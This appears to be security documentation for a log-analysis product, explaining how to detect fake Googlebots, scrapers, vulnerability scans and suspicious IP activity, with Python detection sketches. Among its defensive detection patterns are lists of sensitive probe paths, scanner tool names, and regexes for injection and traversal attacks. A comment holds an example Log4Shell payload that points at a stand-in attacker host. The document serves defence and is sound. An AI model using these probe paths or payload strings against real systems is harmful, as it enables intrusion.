Security & Threat Detection with Server Logs
The Fake Bot Problem
User-Agent strings are one of the most commonly relied-upon signals for identifying crawlers, but they are trivially spoofed. Any HTTP client can set its User-Agent to anything it wants, and many attackers take advantage of this.
Attackers impersonate Googlebot and other legitimate crawlers for several reasons:
- Faster responses — many sites serve pre-rendered or cached content to known bots, giving impersonators quick access to fully rendered page content
- Unblocked access — bot-specific allow lists often bypass geo-blocks, paywalls, or login walls
- Bypassed rate limits — sites frequently exempt recognised crawlers from rate limiting, allowing aggressive scraping
- Evasion of security rules — WAF rules and firewall policies often allow-list known bot User-Agents
Never trust User-Agent strings alone. Always verify crawler identity by checking the request's source IP against the bot operator's officially published IP ranges. LogLens does this verification automatically for all major crawlers.
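As a concrete illustration, here is a minimal sketch of the reverse-then-forward DNS check that Google and Bing both document for verifying their crawlers, using only Python's standard library. The hostname suffixes and example IPs below are specific to Googlebot; other operators publish their own suffixes or downloadable IP range files.

```python
import socket

# Hostname suffixes Google documents for its crawlers; other operators
# (Bingbot, Applebot, etc.) publish their own suffixes or IP range files.
GOOGLEBOT_SUFFIXES = (".googlebot.com", ".google.com")

def is_verified_googlebot(ip: str) -> bool:
    """Reverse-then-forward DNS check: the PTR record must end in a known
    Google suffix, and that hostname must resolve back to the same IP."""
    try:
        hostname, _, _ = socket.gethostbyaddr(ip)        # reverse lookup (PTR)
    except OSError:
        return False                                     # no PTR record at all
    if not hostname.endswith(GOOGLEBOT_SUFFIXES):
        return False
    try:
        forward_ips = socket.gethostbyname_ex(hostname)[2]  # forward lookup (A)
    except OSError:
        return False
    return ip in forward_ips                             # must resolve back to the claimant

# Example: a request whose User-Agent claims "Googlebot"
# is_verified_googlebot("66.249.66.1")   # True for a genuine Googlebot source IP
# is_verified_googlebot("203.0.113.7")   # False for an impostor
```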
Identifying Content Scrapers
Content scrapers have distinctive patterns in server logs that set them apart from legitimate users and crawlers. Once you know what to look for, they become straightforward to spot.
Rapid sequential requests
Scrapers typically make dozens or hundreds of requests per minute from a single IP or a small cluster of IPs. Legitimate users rarely exceed a few pages per minute, and even high-volume crawlers like Googlebot pace their requests to avoid overloading your server.
No asset loading
Scrapers request HTML pages only. They do not load CSS, JavaScript, images, fonts, or any other assets that a real browser would need to render the page. If you see an IP fetching page after page with zero corresponding asset requests, it is almost certainly a scraper.
Systematic URL traversal
Look for request patterns that follow a predictable structure: alphabetical ordering, paginated sequences (/page/1, /page/2, /page/3...), or the exact order URLs appear in your sitemap. Human browsing is inherently irregular; machine traversal is not.
Missing referrer and cookie data
Scrapers rarely send referrer headers or manage cookies. A stream of requests with empty Referer headers and no cookies, combined with the patterns above, is a strong signal.
Cloud provider IP addresses
Most scrapers run on cloud infrastructure. Requests originating from AWS, Google Cloud Platform, or Microsoft Azure IP ranges — especially when combined with the patterns above — are highly likely to be automated scraping.
LogLens automatically flags IPs that exhibit scraping patterns. Use the IP Analysis page to filter by cloud provider ASN and cross-reference with request rates for fast identification.
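Outside LogLens, the same heuristics can be scripted against raw logs. The sketch below assumes access-log entries already parsed into dicts with ip, path, referer, and minute fields (the parsing step is omitted), and the thresholds are illustrative rather than tuned values.

```python
from collections import defaultdict

# Illustrative thresholds -- tune against your own traffic baseline.
PEAK_REQ_PER_MIN = 60       # sustained page rate a human reader is unlikely to hit
ASSET_EXTENSIONS = (".css", ".js", ".png", ".jpg", ".svg", ".woff2", ".ico")

def flag_scraper_ips(entries):
    """entries: iterable of dicts with 'ip', 'path', 'referer', and 'minute'
    (the request timestamp truncated to the minute). Returns suspect IPs."""
    per_ip = defaultdict(lambda: {"pages": 0, "assets": 0, "no_referer": 0,
                                  "minutes": defaultdict(int)})
    for e in entries:
        stats = per_ip[e["ip"]]
        if e["path"].lower().endswith(ASSET_EXTENSIONS):
            stats["assets"] += 1          # real browsers fetch these constantly
        else:
            stats["pages"] += 1
            stats["minutes"][e["minute"]] += 1
            if not e["referer"] or e["referer"] == "-":
                stats["no_referer"] += 1

    suspects = []
    for ip, s in per_ip.items():
        peak_rate = max(s["minutes"].values(), default=0)
        pages_without_assets = s["pages"] >= 20 and s["assets"] == 0
        blank_referers = s["pages"] and s["no_referer"] / s["pages"] > 0.9
        if peak_rate >= PEAK_REQ_PER_MIN or (pages_without_assets and blank_referers):
            suspects.append(ip)
    return suspects
```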
Vulnerability Scanning Patterns
Automated vulnerability scanners probe for common weaknesses by requesting paths associated with known exploits, exposed configuration files, and popular admin interfaces. These paths should never appear in legitimate traffic.
Watch for request surges to sensitive paths
- /wp-login.php
- /wp-admin/
- /.env
- /config.yml
- /.git/config
- /api/v1/users
- /graphql
- /swagger.json
- /api-docs
A surge of 404 responses to sensitive paths is one of the clearest indicators of automated vulnerability scanning. These requests typically arrive in bursts — tens or hundreds within a few minutes — and often originate from a single IP or a small set of rotating IPs.
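A minimal sketch of this check, assuming log entries parsed into dicts with ip, path, and status fields; the path set mirrors the list above and the min_hits threshold is an arbitrary starting point.

```python
from collections import Counter

# The paths listed above; extend with anything specific to your stack.
SENSITIVE_PATHS = {
    "/wp-login.php", "/wp-admin/", "/.env", "/config.yml", "/.git/config",
    "/api/v1/users", "/graphql", "/swagger.json", "/api-docs",
}

def probing_ips(entries, min_hits=10):
    """entries: dicts with 'ip', 'path', 'status'. Flags IPs that rack up
    404s against sensitive paths -- the signature of an automated scanner."""
    hits = Counter()
    for e in entries:
        if e["status"] == 404 and e["path"] in SENSITIVE_PATHS:
            hits[e["ip"]] += 1
    return [ip for ip, n in hits.items() if n >= min_hits]
```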
Suspicious IP Pattern Detection
Beyond specific attack signatures, certain IP-level patterns warrant immediate investigation.
Volume anomalies
A single IP making 1,000 or more requests per hour is abnormal for almost any website. Legitimate users rarely exceed a few hundred page views in a session, even on high-engagement sites.
Rotating IPs from the same subnet
Sophisticated attackers rotate through IP addresses within the same /24 or /16 subnet to avoid per-IP rate limits. When you see multiple IPs from the same block all making elevated requests, treat them as a single actor.
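To make the subnet grouping concrete, the following sketch collapses client IPs into /24 blocks with Python's ipaddress module (IPv4 assumed), so a rotating attacker surfaces as one hot subnet rather than many quiet IPs.

```python
import ipaddress
from collections import Counter

def counts_by_subnet(client_ips, prefix=24):
    """Collapse per-request client IPs (IPv4 assumed) into /24 blocks
    and return the busiest subnets."""
    subnets = Counter()
    for ip in client_ips:
        net = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
        subnets[str(net)] += 1
    return subnets.most_common(10)

# Example (illustrative output):
# counts_by_subnet(e["ip"] for e in entries)
#   -> [("198.51.100.0/24", 4812), ("203.0.113.0/24", 97), ...]
```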
Traffic from unexpected regions
If your site primarily serves users in North America and Europe, a sudden spike of requests from a region where you have no audience is worth investigating — especially if paired with other suspicious signals.
Unusual timing patterns
Requests arriving between 2:00 AM and 5:00 AM in your primary audience's local time, carrying User-Agent strings that claim to be mainstream browsers (Chrome, Firefox, Safari), are suspicious. Real users are largely asleep; automated tools are not.
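A small sketch of that timing filter, assuming each entry carries a timestamp already converted to your audience's local timezone and a user_agent string; the quiet-hours window and browser tokens are illustrative.

```python
BROWSER_TOKENS = ("Chrome", "Firefox", "Safari")
QUIET_HOURS = range(2, 5)    # 02:00-04:59 in your primary audience's timezone

def off_hours_browser_traffic(entries):
    """entries: dicts with 'timestamp' (a datetime already in local time)
    and 'user_agent'. Returns the requests worth a closer look."""
    return [e for e in entries
            if e["timestamp"].hour in QUIET_HOURS
            and any(tok in e["user_agent"] for tok in BROWSER_TOKENS)]
```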
Use LogLens IP Analysis to sort by request volume and filter by time of day. Combine with geographic filters to quickly surface the patterns described above.
Setting Up Effective Alerts
Detection is only useful if it surfaces threats quickly enough to act on them. LogLens ships five security-relevant alerts that cover the patterns above; all are enabled by default.
Automated Hacking Probe
Looks for the exact patterns described in Vulnerability Scanning Patterns: requests to known-vulnerable paths (/.env, /wp-config.php, /.git/config, etc.), known scanner user-agents (sqlmap, nuclei, nikto, gobuster), and attack signatures in URLs (SQL injection, path traversal, XSS, Log4Shell, command injection). One alert is fired per source IP per six-hour cooldown window so a single sustained scan doesn’t produce hundreds of emails.
The alert is automatically promoted to critical when any probe receives a 200 or 3xx response — that means the targeted resource may exist on your origin and you should audit it immediately.
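For illustration, the sketch below shows the kind of URL signature matching the alert describes. The regexes are deliberately simplified; they are not LogLens's actual rule set and are no substitute for a real WAF.

```python
import re
from urllib.parse import unquote

# Deliberately simplified signatures for illustration only -- production WAF
# rule sets are far more extensive and handle many more encodings.
ATTACK_SIGNATURES = {
    "sql_injection":     re.compile(r"(union\s+select|or\s+1=1|sleep\(\d+\))", re.I),
    "path_traversal":    re.compile(r"\.\./\.\./"),
    "xss":               re.compile(r"<script\b|javascript:", re.I),
    "log4shell":         re.compile(r"\$\{jndi:", re.I),
    "command_injection": re.compile(r";\s*(cat|wget|curl)\s", re.I),
}

def classify_probe(url: str):
    """Return the names of any attack signatures matched by a request URL.
    URLs are percent-decoded first since scanners routinely encode payloads."""
    decoded = unquote(url)
    return [name for name, pattern in ATTACK_SIGNATURES.items()
            if pattern.search(decoded)]

# Examples:
# classify_probe("/search?q=%27%20OR%201%3D1--")          -> ["sql_injection"]
# classify_probe("/index?x=${jndi:ldap://evil.example}")  -> ["log4shell"]
```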
Exposed Secret in URL
Scans your URLs daily for tokens, API keys, JWTs, AWS access keys, Stripe live keys, and similar high-precision patterns. Anything found is reported with the secret value redacted (you already have the original in your logs — the alert email shouldn’t duplicate the leak). Treat any finding as compromised: rotate the value first, then patch the source (for example a form submitting via GET instead of POST, a leaky webhook handshake, or an environment variable rendered client-side).
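The sketch below illustrates the kind of high-precision matching and redaction described above, with deliberately simplified patterns; it is not LogLens's actual detector.

```python
import re

# Simplified versions of the kinds of high-precision patterns described above.
SECRET_PATTERNS = {
    "aws_access_key":  re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "stripe_live_key": re.compile(r"\bsk_live_[0-9a-zA-Z]{24,}\b"),
    "jwt":             re.compile(r"\beyJ[\w-]+\.[\w-]+\.[\w-]+\b"),
}

def find_secrets(url: str):
    """Report secret *types* found in a URL with the values redacted --
    the finding matters, not another copy of the leaked value."""
    findings = []
    for name, pattern in SECRET_PATTERNS.items():
        for match in pattern.finditer(url):
            value = match.group(0)
            findings.append((name, value[:6] + "..." + value[-4:]))
    return findings

# Example (hypothetical key):
# find_secrets("/callback?key=sk_live_abcdefghijklmnopqrstuvwx")
#   -> [("stripe_live_key", "sk_liv...uvwx")]
```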
Massive Traffic Spike
Fires when traffic surges far above your baseline. The alert email lists the top-hit URLs — hits concentrated on a few content paths usually mean viral or press traffic, while hits concentrated on attack-prone endpoints (/login, /search, /api/...) usually mean DDoS or aggressive scraping.
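As a rough illustration of baseline comparison (not LogLens's actual algorithm), the sketch below flags an hour whose request count sits well above the trailing average; the multiplier and minimum are placeholder values.

```python
from statistics import mean

def spike_detected(hourly_counts, multiplier=3.0, min_requests=1000):
    """hourly_counts: request totals for recent hours, most recent last.
    Flags the latest hour when it sits well above the trailing average."""
    if len(hourly_counts) < 2:
        return False
    baseline = mean(hourly_counts[:-1])
    latest = hourly_counts[-1]
    return latest >= min_requests and latest > baseline * multiplier

# A quiet site suddenly receiving 9,000 requests in an hour:
# spike_detected([700, 650, 720, 690, 9000])  -> True
```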
Bot Impersonation Surge
Fires when a spike of requests claims to be Googlebot, Bingbot, or another major crawler but originates from IPs that don’t belong to those operators. This is the bread-and-butter signal for scrapers forging User-Agents to slip past bot allow lists, rate-limit exemptions, and WAF rules.
Server Error Spike (5xx)
An attack that’s actually impacting availability will show up here even before the traffic alert fires — an origin straining under scraping or a fuzzer triggering unhandled errors will push the 5xx rate up sharply.
The defaults are set conservatively to minimise false positives. If you want earlier detection on a specific category, raise the check frequency for that alert in Alerts › Settings rather than lowering the trigger threshold — tighter thresholds usually create more noise than signal.
Response Strategies
Different threat types call for different responses. Acting quickly with the right approach prevents damage while avoiding collateral impact on legitimate traffic.
| Threat | Recommended Response | Details |
|---|---|---|
| Fake bots | Block at CDN/edge | Use Cloudflare WAF rules or AWS WAF to block IPs that claim a bot User-Agent but fail IP verification |
| Content scrapers | Rate limit | Enforce 60 requests per minute for unverified clients; tighten further for repeat offenders |
| Vulnerability scanners | Block + alert | Block the source IPs and investigate the specific paths being targeted to confirm no exposure |
| Credential stuffing | Rate limit + CAPTCHA | Apply strict rate limits to authentication endpoints and require CAPTCHA after failed attempts |
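The table's 60-requests-per-minute figure maps naturally onto a sliding-window limiter. The sketch below shows the mechanics in application code purely for illustration; in practice the limit is usually enforced at the CDN or edge (Cloudflare, AWS WAF) rather than in your app.

```python
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 60
MAX_REQUESTS = 60             # per-minute budget for unverified clients (from the table)

_recent = defaultdict(deque)  # ip -> timestamps of requests inside the window

def allow_request(ip, now=None):
    """Sliding-window limiter: at most MAX_REQUESTS per WINDOW_SECONDS per IP.
    Returns False when the caller should respond with 429 or a challenge."""
    now = time.monotonic() if now is None else now
    window = _recent[ip]
    while window and now - window[0] > WINDOW_SECONDS:
        window.popleft()       # expire requests that left the window
    if len(window) >= MAX_REQUESTS:
        return False
    window.append(now)
    return True
```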
Security Review Cadence
Effective security monitoring is a habit, not a one-time setup. Establish a regular review cadence to stay ahead of evolving threats.
Weekly
- Review top IPs by request volume and check for new unverified high-volume sources
- Check the 404 report for new sensitive paths being probed
- Verify that active alerts fired correctly (or confirm no events warranted them)
Monthly
- Audit the full bot list — look for new bot User-Agent strings that appeared this month
- Review rate-limit and block rules for relevance; remove blocks that are no longer necessary
- Check alert thresholds against current traffic levels and adjust if your baseline has shifted
Quarterly
- Full security posture review: compare current threat landscape to previous quarter
- Update firewall rules and WAF managed rule sets
- Review geographic access policies if your audience has shifted
- Validate that all sensitive paths return proper responses (not leaked configuration data)